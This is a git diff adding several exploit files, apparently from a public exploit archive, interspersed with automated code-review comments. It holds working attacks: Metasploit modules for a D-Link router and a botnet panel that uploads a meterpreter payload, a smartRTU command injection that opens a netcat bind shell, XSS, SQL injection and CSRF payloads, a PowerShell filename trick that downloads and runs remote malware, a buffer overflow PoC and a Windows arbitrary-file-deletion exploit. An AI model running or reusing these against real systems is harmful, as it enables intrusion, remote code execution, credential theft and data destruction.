diff --git a/exploits/hardware/webapps/47250.rb b/exploits/hardware/webapps/47250.rb new file mode 100755 index 000000000..946ae13e8 --- /dev/null +++ b/exploits/hardware/webapps/47250.rb @@ -0,0 +1,62 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control', + 'Description' => %q{ + This module attempts to find D-Link router DIR-600M which is +vulnerable to Incorrect Access Control. The vulnerability exists in + wan.htm, which is accessible without authentication. This +vulnerabilty can lead an attacker to manipulate WAN settings. + This module has been tested successfully on Firmware Version +3.01,3.02,3.03,3.04,3.05,3.06. + }, + 'Author' => [ 'Devendra Singh Solanki ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + 'CVE', '2019-13101' + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Aug 08 2019')) + + register_options( + [ + Opt::RPORT(80) + ]) + end + + def run_host(ip) + res = send_request_cgi({'uri' => '/login.htm'}) + if res.nil? or res.code == 404 + print_error("#{rhost}:#{rport} - Host is down.") + return + end + + if res and res.code == 200 and res.body =~ /D-Link/ + print_good("#{rhost}:#{rport} - It is a D-Link router") + else + print_error("#{rhost}:#{rport} - Not a D-Link router") + return + end + + res = send_request_cgi({'uri' => '/wan.htm'}) + + if res and res.code == 200 and res.body =~ /PPPoE/ + print_good("#{rhost}:#{rport} - Router is vulnerable for +Incorrect Access Control. CVE-2019-13101") + else + print_error("#{rhost}:#{rport} - Router is with different firmware.") + return + end + + end +end \ No newline at end of file 
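Review bot: The `'References'` entry is a flat array `[ 'CVE', '2019-13101' ]` rather than an array of `[type, value]` pairs, so the module's reference list will not be parsed as a CVE reference; it should read `'References' => [ ['CVE', '2019-13101'] ]`. `run_host` includes `Msf::Auxiliary::Report` but never records its finding, so the result only reaches the console; after the positive `/wan.htm` match add `report_vuln(host: ip, name: self.name, refs: self.references)` so it lands in the database like other scanner modules. The conditions use `or`/`and` (`if res.nil? or res.code == 404`, `if res and res.code == 200 ...`); prefer `||`/`&&` for boolean logic, and the later `res and` guards are redundant once the `res.nil?` branch has already returned.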
diff --git a/exploits/linux/dos/47254.txt b/exploits/linux/dos/47254.txt new file mode 100644 index 000000000..299dd2206 --- /dev/null +++ b/exploits/linux/dos/47254.txt 
@@ -0,0 +1,64 @@ +Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow +Date: 2019-08-13 +Exploit Author: Carter Yagemann +Vendor Homepage: https://abcnotation.com/abc2mtex/ +Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz +Version: 1.6.1 +Tested on: Debian Buster + +An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return +address from the openIn function by providing a long input filename. This +carries similar risk to CVE-2004-1257. + +Setup: + +$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz +$ tar -xzf abc2mtex1.6.1.tar.gz +$ make + +$ gcc --version +gcc (Debian 8.3.0-6) 8.3.0 +Copyright (C) 2018 Free Software Foundation, Inc. +This is free software; see the source for copying conditions. There is NO +warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. + +PoC: + +$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA + +GDB: + +We're going to place a breakpoint before and after abc.c:241 to show the overflow. + +$ gdb -q ./abc2mtex +Reading symbols from ./abc2mtex...done. +(gdb) break abc.c:241 +Breakpoint 1 at 0x4139: file abc.c, line 241. +(gdb) break abc.c:242 +Breakpoint 2 at 0x414c: file abc.c, line 242. +(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA +Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA + +Breakpoint 1, openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:241 +241 (void) strcpy(savename,filename); +(gdb) bt +#0 openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:241 +#1 0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273 +(gdb) c +Continuing. 
+ +Breakpoint 2, openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:242 +242 (void) strcat(filename,".abc"); +(gdb) bt +#0 openIn (filename=0x7fffffffe240 'A' , "FEDCBA") at abc.c:242 +#1 0x0000414243444546 in ?? () +#2 0x00007fffffffe4f8 in ?? () +#3 0x0000000200000000 in ?? () +#4 0x0000000000000000 in ?? () +(gdb) c +Continuing. +file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist + +Program received signal SIGSEGV, Segmentation fault. +0x0000414243444546 in ?? () +(gdb) quit \ No newline at end of file diff --git a/exploits/php/remote/47256.rb b/exploits/php/remote/47256.rb new file mode 100755 index 000000000..abc65cbe0 --- /dev/null +++ b/exploits/php/remote/47256.rb 
@@ -0,0 +1,106 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Tesla Agent Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of tesla agent botnet panel. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ege Balcı ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://prodaft.com'] + ], + 'DefaultOptions' => + { + 'SSL' => false, + 'WfsDelay' => 5, + }, + 'Platform' => ['php'], + 'Arch' => [ ARCH_PHP ], + 'Targets' => + [ + ['PHP payload', + { + 'Platform' => 'PHP', + 'Arch' => ARCH_PHP, + 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => "July 10 2018", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']), + ] + ) + end + + def check + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'), + ) + #print_status(res.body) + if res && res.body.include?('SQLSTATE') + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + check + + name = '.'+Rex::Text.rand_text_alpha(4)+'.php' + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'), + 'encode_params' => true, + 'vars_get' => { + 'table' => 'passwords', + 'primary' => 'password_id', + 'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}', + 'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > 
#{name}\"") + } + ) + + if res && res.code == 200 && res.body.include?('recordsTotal') + print_good("Payload uploaded as #{name}") + else + print_error('Payload upload failed :(') + Msf::Exploit::Failed + end + + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5 + ) + + if res && res.code == 200 + print_good("Payload successfully triggered !") + else + print_error('Payload trigger failed :(') + Msf::Exploit::Failed + end + + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47234.py b/exploits/php/webapps/47234.py new file mode 100755 index 000000000..77a6e9ca9 --- /dev/null +++ b/exploits/php/webapps/47234.py @@ -0,0 +1,38 @@ +#!/usr/bin/python + +# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download +# Date: 29 June 2019 +# Exploit Author: (@xerubus | mogozobo.com) +# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local +# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/ +# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 +# CVE-ID: CVE-2019-14927 +# Full write-up: https://www.mogozobo.com/?p=3593 + +import sys, os, requests, socket + +os.system('clear') + +print("""\ + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Conf_Me-smartRTU by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + """) + +host = raw_input("Enter RTU IP address: ") + +php_page = '/saveSettings.php' +url = "http://{}{}".format(host, php_page) + +print "[+] Attempting to download smartRTU configuration file" + +r = requests.get(url) +if r.status_code == 200: + print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n" + with open('smartRTU_conf.xml', 'w') as f: + f.write(r.content) \ No newline at end of file 
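Review bot: `exploit` calls `check` but discards its result, so a target that `check` reports as `Safe` still receives the injection request; gate on it with `fail_with(Failure::NotVulnerable, 'Target does not appear vulnerable') unless check == Exploit::CheckCode::Appears`. Likewise the two bare `Msf::Exploit::Failed` expressions in the error branches only evaluate a constant and fall through to the next request; they should be `fail_with(Failure::UnexpectedReply, 'Payload upload failed')` and `fail_with(Failure::Unknown, 'Payload trigger failed')` so the module actually aborts. The `Description` is a single sentence that names no affected version and `References` holds only the vendor homepage; the leftover `#print_status(res.body)` in `check` should be dropped.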
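Review bot: The script is Python 2 only (`raw_input`, `print "..."` statements) while the shebang is a bare `#!/usr/bin/python` and the header never states the interpreter version; add `# Requires: Python 2.7` to the header block, since the mix of the `print(...)` call and `print` statements will not even parse under Python 3. `requests.get(url)` is issued with no `timeout`, so an unreachable host hangs the script indefinitely; `requests.get(url, timeout=10)` is the usual form. A non-200 response is silently ignored, leaving the user with no message that the request failed.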
diff --git a/exploits/php/webapps/47235.py b/exploits/php/webapps/47235.py new file mode 100755 index 000000000..cd27f151e --- /dev/null +++ b/exploits/php/webapps/47235.py 
@@ -0,0 +1,69 @@ +#!/usr/bin/python + +# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection +# Date: 29 June 2019 +# Exploit Author: (@xerubus | mogozobo.com) +# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local +# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/ +# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 +# CVE-ID: CVE-2019-14931 +# Full write-up: https://www.mogozobo.com/?p=3593 + +import sys, os, requests, socket + +os.system('clear') + +print("""\ + _ _ + ___ (~ )( ~) + / \_\ \/ / +| D_ ]\ \/ -= Bind_Me-smartRTU by @xerubus =- +| D _]/\ \ -= We all have something to hide =- + \___/ / /\ \\ + (_ )( _) + @Xerubus + """) + +host = raw_input("Enter RTU IP address: ") +port = raw_input("Enter bind shell port number: ") + +php_page = '/action.php' +url = "http://{}{}".format(host, php_page) +payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'} + +print "\n[+] Building payload" +print "[+] Sending payload" +print "[+] Attempting connection to smartRTU" + +try: + r = requests.post(url, data=payload, timeout=1) +except: + pass + +port = (int(port)) + +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((host, port)) + + try : + print "[+] Connected to the smartRTU!\n" + while 1: + cmd = raw_input("(smartRTU-shell) # "); + s.send(cmd + "\n"); + result = s.recv(1024).strip(); + if not len(result) : + print "\n[!] Play nice now skiddies....\n\n" + s.close(); + break; + print(result); + + except KeyboardInterrupt: + print "\n[+] ^C Received, closing connection" + s.close(); + except EOFError: + print "\n[+] ^D Received, closing connection" + s.close(); + +except socket.error: + print "[!] Failed to connect to bind shell." \ No newline at end of file diff --git a/exploits/php/webapps/47247.txt b/exploits/php/webapps/47247.txt new file mode 100644 index 000000000..2a1a569a5 
--- /dev/null +++ b/exploits/php/webapps/47247.txt @@ -0,0 +1,30 @@ +# Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise +# Google Dork: N/A +# Date: 11.08.2019 +# Exploit Author: Ilca Lucian Florin +# Vendor Homepage: https://www.sugarcrm.com +# Version: 9.0.0 +# Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76 +# CVE : 2019-14974 + +The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser. + +Steps to reproduce: + +1.Attacker will craft a malicious payload and create a legitimate link with the payload included; +2. Attacker will send the link to the victim; +3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser. + +The behavior can be observed by visiting the following URL: + +https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms:// + +Clicking on FULL VERSION OF WEBSITE will trigger the XSS. + +Impact statement: + +Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances. + +Recommendation: + +Always ensure to validate parameters input and encode the output. \ No newline at end of file diff --git a/exploits/php/webapps/47249.txt b/exploits/php/webapps/47249.txt new file mode 100644 index 000000000..aac1ac173 --- /dev/null +++ b/exploits/php/webapps/47249.txt 
@@ -0,0 +1,23 @@ +#Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection +#Dork: inurl:"index.php?option=com_jsjobs" +#Date: 13.08.19 +#Exploit Author: qw3rTyTy +#Vendor Homepage: https://www.joomsky.com/ +#Software Link: https://www.joomsky.com/5/download/1 +#Version: 1.2.5 +#Tested on: Debian/nginx/joomla 3.9.0 +##################################### +#Vulnerability details: +##################################### +Vulnerable code is in line 171 in file site/models/customfields.php + + 169 function dataForDepandantField( $val , $childfield){ + 170 $db = $this->getDBO(); + 171 $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'"; //!!! + 172 $db->setQuery($query); + 173 $data = $db->loadObject(); + +##################################### +#PoC: +##################################### +$> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E \ No newline at end of file diff --git a/exploits/php/webapps/47251.txt b/exploits/php/webapps/47251.txt new file mode 100644 index 000000000..fa9eff0ce --- /dev/null +++ b/exploits/php/webapps/47251.txt @@ -0,0 +1,51 @@ +# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5 +# Google Dork: inurl:"/wp-content/plugins/download-manager +# Date: 24 may, 2019 +# Exploit Author: Princy Edward +# Exploit Author Blog : https://prinyedward.blogspot.com/ +# Vendor Homepage: https://www.wpdownloadmanager.com/ +# Software Link: https://wordpress.org/plugins/download-manager/ +# Tested on: Apache/2.2.24 (CentOS) +POC + +#1 + +There is no CSRF nonce check performed in "POST +/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. + +#Code + +
+ + + + + + + +
+ +#2 + +There is no CSRF nonce check performed in "POST +/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat +e&id=default" request. + +#Code + +
+ + + + + + +
\ No newline at end of file diff --git a/exploits/windows/dos/47248.py b/exploits/windows/dos/47248.py new file mode 100755 index 000000000..8c6687d27 --- /dev/null +++ b/exploits/windows/dos/47248.py 
@@ -0,0 +1,144 @@ +''' +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt +[+] ISR: Apparition Security + + +[Vendor] +www.microsoft.com + + +[Product] +Windows PowerShell + +Windows PowerShell is a Windows command-line shell designed especially for system administrators. +PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination. + + +[Vulnerability Type] +Unsanitized Filename Command Execution + + +[CVE Reference] +N/A + + +[Security Issue] +PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames. +This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file; +or the running of unexpected commands straight from the filename itself without the need for a second file. + +For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf. +Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard +Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script. + +However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working. + +Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger +the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts +as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell. 
+ +My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant. +Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest) +abbreviated for space then it sleeps for 2 seconds and finally executes. + +C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) + +This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed. +We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are +commands can be stored. + +For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files. + +First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe". +c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'")) + +Give the PS script a normal begining name, then separate commands using ";" semicolon e.g. + +Test;powershell -e ;2.ps1 + +Create the executable without a file extension to save space for the filename then save it back using the -O parameter. +The "-e" is abbreviated for EncodedCommand to again save filename space. + +Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever. +Double click to open in PowerShell watch the file get downloaded saved and executed! + +My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory. 
+ +Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string! + + +[Exploit / PoC] +''' + +from base64 import b64encode +import argparse,sys +#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC +#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename. +#Expects hostname/ip-addr of web-server housing the exploit. +#By hyp3rlinx +#Apparition Security +#==================== + + +def parse_args(): + parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.") + parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.") + parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.") + return parser.parse_args() + +def main(args): + PSEmbedFilenameMalwr="" + if args.ipaddress: + PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name + return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')) + +def create_file(payload): + f=open("Test;PowerShell -e "+payload+";2.ps1", "w") + f.write("Write-Output 'Have a nice day!'") + f.close() + +if __name__=="__main__": + + parser = argparse.ArgumentParser() + PSCmds = main(parse_args()) + + if len(sys.argv)==1: + parser.print_help(sys.stderr) + sys.exit(1) + + create_file(PSCmds) + print "PowerShell - Unsantized Filename Command Execution File created!" 
+ print "By hyp3rlinx" + +''' +[POC Video URL] +https://www.youtube.com/watch?v=AH33RW9g8J4 + + +[Network Access] +Remote + + +[Severity] +High + + +[Disclosure Timeline] +Vendor Notification: July 20, 2019 +MSRC "does not meet the bar for security servicing" : July 23, 2019 +August 1, 2019 : Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). +''' + +hyp3rlinx \ No newline at end of file diff --git a/exploits/windows/local/47253.cpp b/exploits/windows/local/47253.cpp new file mode 100644 index 000000000..a364e333b --- /dev/null +++ b/exploits/windows/local/47253.cpp 
@@ -0,0 +1,244 @@ +/* +# Author : Abdelhamid Naceri +# Discovered On : 13/08/2019 +# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc +Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion +from a low integrity user . +# Still Unpatched On 13/08/2019 +Here Is A Demo Video https://youtu.be/jqYwMcNvTtM +*/ +#include"windows.h" +#include"iostream" +#include"conio.h" +#include"stdio.h" +#include"tlhelp32.h" +#include"cstdio" +#include"wchar.h" +#include"process.h" +#include"wchar.h" +#include"string" +#include"tchar.h" + +#pragma warning(disable : 4996) +#pragma comment(lib, "advapi32.lib") +#ifndef UNICODE +typedef std::string String; +#else +typedef std::wstring String; +#endif + +using namespace std; + +bool FileExists(const wchar_t* file) { + if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND) + { + return false; + } + else { + return true; + } +} + +void remove_dir(const wchar_t* folder) +{ + std::wstring search_path = std::wstring(folder) + _T("/*.*"); + std::wstring s_p = std::wstring(folder) + _T("/"); + WIN32_FIND_DATA fd; + HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd); + if (hFind != INVALID_HANDLE_VALUE) { + do { + if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) { + if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0) + { + remove_dir((wchar_t*)(s_p + fd.cFileName).c_str()); + } + } + else { + DeleteFile((s_p + fd.cFileName).c_str()); + } + } while (::FindNextFile(hFind, &fd)); + ::FindClose(hFind); + _wrmdir(folder); + } +} + +void killProcessByName(const wchar_t* filename) +{ + HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL); + PROCESSENTRY32 pEntry; + pEntry.dwSize = sizeof(pEntry); + BOOL hRes = Process32First(hSnapShot, &pEntry); + while (hRes) + { + if (wcscmp(pEntry.szExeFile, filename) == 0) + { + HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0, + (DWORD)pEntry.th32ProcessID); 
+ if (hProcess != NULL) + { + TerminateProcess(hProcess, 9); + CloseHandle(hProcess); + } + } + hRes = Process32Next(hSnapShot, &pEntry); + } + CloseHandle(hSnapShot); +} + +bool IsProcessRunning(const wchar_t* processName) +{ + bool exists = false; + PROCESSENTRY32 entry; + entry.dwSize = sizeof(PROCESSENTRY32); + + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); + + if (Process32First(snapshot, &entry)) + while (Process32Next(snapshot, &entry)) + if (!_wcsicmp(entry.szExeFile, processName)) + exists = true; + + CloseHandle(snapshot); + return exists; +} + +bool dirExists(const std::string& dirName_in) +{ + DWORD ftyp = GetFileAttributesA(dirName_in.c_str()); + if (ftyp == INVALID_FILE_ATTRIBUTES) + return false; + + if (ftyp & FILE_ATTRIBUTE_DIRECTORY) + return true; + + return false; +} + +void KillEdge() +{ + killProcessByName(L"MicrosoftEdge.exe"); +} + +void StartEdge() +{ + try + { + system("start microsoft-edge:"); + } + catch (...){} +} + +void exploit(const char* path) { + //Inintializing the variable before begining + int attempt = 0; + string command; + wchar_t* userprofile = _wgetenv(L"USERPROFILE"); + const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe"); + //I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution + //I deleted him first + const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState"); + wstring froamingpath(userprofile); + froamingpath += wstring(roamingpath); + wstring fullpath(userprofile); + fullpath += std::wstring(relpath); + wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str(); + wstring fpath(szBuffsrc); + string strfpath(fpath.begin(), fpath.end()); + //Check If MS-Edge Need To Write DACL Or Not + + if (dirExists(strfpath) != true) { + printf("[!] 
Wait MS-Edge Need To Write The DACL"); + StartEdge(); + for (;;) { + Sleep(1000); + if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; } + } + StartEdge(); + Sleep(7000); + KillEdge(); + printf("\r "); + + } + + //End Of Check + printf("\r# Author : Abdelhamid Naceri\n"); + printf("# Tested On Windows 10 32&64bit\n"); + printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"); + printf("[+] Checking If Path Exist ..."); + Sleep(2000); + if (dirExists(path) != true) { + printf("Your Path Is Invalid"); + ExitProcess(EXIT_FAILURE); } + else { + printf("Exist !\n"); + KillEdge(); + printf("[+] Starting MS-Edge ...\n"); + StartEdge(); + Sleep(4000); + printf("[+] Killing MS-Edge ...\n"); + KillEdge(); + Sleep(3000); + printf("[+] Wipping MS-Edge Directory ...\n"); + killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files + remove_dir(roamingpath); + remove_dir(szBuffsrc); + Sleep(2000); + remove_dir(szBuffsrc); + printf("[+] Checking If Directory Exist Anymore ..."); + if (dirExists(strfpath) == true) { + + if (dirExists(strfpath) == true) { + printf("Something Went Wrong"); + printf("\n[!] 
You Should Delete The Files YourSelf Press Anything To Continue"); + command = "explorer "; + command.append(strfpath); + system(command.c_str()); + _getch(); + goto Continue; + } + } + else { +Continue: + printf(" Done\n"); + Sleep(3000); + printf("[+] Attempting to Create Junction To Target ...\n"); + command = "mklink /J "; + command.append("\""); + command.append(strfpath); + command.append("\""); + command.append(" "); + command.append("\""); + command.append(path); + command.append("\""); + system(command.c_str()); + printf("Done\n"); + Sleep(3000); + printf("[+] Firing Up MS-Edge Again ...\n"); + StartEdge(); + do { Sleep(1000); } while (IsProcessRunning(L"MicrosoftEdge.exe")); + Sleep(3000); + StartEdge(); + command = "explorer "; + command.append(path); + printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n"); + system(command.c_str()); + printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n"); + _getch(); + printf("Cleaning ..."); + _wremove(szBuffsrc); + _wrmdir(szBuffsrc); + ExitProcess(EXIT_SUCCESS); + } + } +} + +int main(int argc, char* argv[]) { + if (argc == 2) {exploit(argv[1]);} + else { + printf("# Author : Abdelhamid Naceri\n"); + printf("# Tested On Windows 10 1903 32&64bit\n"); + printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n"); + printf("[!] Usage : poc.exe TargetPath"); + } + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/exploits/windows/webapps/47252.txt b/exploits/windows/webapps/47252.txt new file mode 100644 index 000000000..b1030dde2 --- /dev/null +++ b/exploits/windows/webapps/47252.txt 
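Review bot: `StartEdge` wraps `system("start microsoft-edge:")` in `try { } catch (...) {}`, but `system` does not throw, so the handler is dead code and should be removed. `killProcessByName` and `IsProcessRunning` hand the `CreateToolhelp32Snapshot` result straight to `Process32First` without checking for `INVALID_HANDLE_VALUE`, and neither checks `GetLastError` when the walk ends. `FileExists` is defined but never called, and the `_T()`/`wchar_t` mix only compiles when `UNICODE` is defined even though the `#ifndef UNICODE` branch selects `std::string`; a header comment such as `// Build as a Unicode project: the Win32 calls below take wchar_t paths` would help the next reader.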
@@ -0,0 +1,194 @@
+Document Title:
+===============
+TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2188
+
+Product:
+https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/
+
+Ticket: https://groups.google.com/forum/#!forum/tortoisesvn
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422
+
+CVE-ID:
+=======
+CVE-2019-14422
+
+
+Release Date:
+=============
+2019-08-13
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2188
+
+
+Common Vulnerability Scoring System:
+====================================
+8.8
+
+
+Vulnerability Class:
+====================
+Code Execution
+
+
+Current Estimated Price:
+========================
+4.000€ - 5.000€
+
+
+Product & Service Introduction:
+===============================
+TortoiseSVN is a really easy to use Revision control / version control /
+source control software for Windows.
